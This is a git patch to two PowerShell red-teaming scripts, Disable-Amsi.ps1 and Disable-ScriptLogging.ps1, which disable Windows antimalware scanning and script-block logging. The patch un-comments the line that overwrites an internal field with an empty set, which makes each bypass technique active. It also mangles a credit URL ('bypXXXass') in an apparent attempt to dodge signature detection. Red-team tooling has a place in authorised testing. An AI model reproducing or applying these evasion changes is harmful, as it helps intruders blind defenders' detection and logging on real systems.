From 68db0339f520845e8acb7c465a2db63095d3b6be Mon Sep 17 00:00:00 2001 From: mb Date: Wed, 19 Jun 2019 15:51:04 +0200 Subject: [PATCH] Quick fix --- red-teaming/Disable-Amsi.ps1 | 4 ++-- red-teaming/Disable-ScriptLogging.ps1 | 2 +- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/red-teaming/Disable-Amsi.ps1 b/red-teaming/Disable-Amsi.ps1 index 153b987..bfbe365 100644 --- a/red-teaming/Disable-Amsi.ps1 +++ b/red-teaming/Disable-Amsi.ps1 @@ -35,7 +35,7 @@ The approaches implemented in this script heavily rely on the previous work of: - Matt Graeber: https://github.com/mattifestation/PSReflect - Matt Graeber: https://twitter.com/mattifestation/status/735261120487772160 -- Avi Gimpel: https://www.cyberark.com/threat-research-blog/amsi-bypass-redux/ +- Avi Gimpel: https://www.cyberark.com/threat-research-blog/amsi-bypXXXass-redux/ - Adam Chester: https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/ .PARAMETER DontDisableBlockLogging @@ -738,7 +738,7 @@ function Disable-Amsi break } } - #$foo.SetValue($null,(New-Object Collections.Generic.HashSet[string])) + $foo.SetValue($null,(New-Object Collections.Generic.HashSet[string])) Write-Host "[+] Finished applying technique 1" return $k0 } diff --git a/red-teaming/Disable-ScriptLogging.ps1 b/red-teaming/Disable-ScriptLogging.ps1 index c677ccb..6b6fed9 100644 --- a/red-teaming/Disable-ScriptLogging.ps1 +++ b/red-teaming/Disable-ScriptLogging.ps1 @@ -108,7 +108,7 @@ function Disable-ScriptLogging break } } - #$foo.SetValue($null,(New-Object Collections.Generic.HashSet[string])) + $foo.SetValue($null,(New-Object Collections.Generic.HashSet[string])) Write-Host "[+] Finished applying technique 1" return $k0 }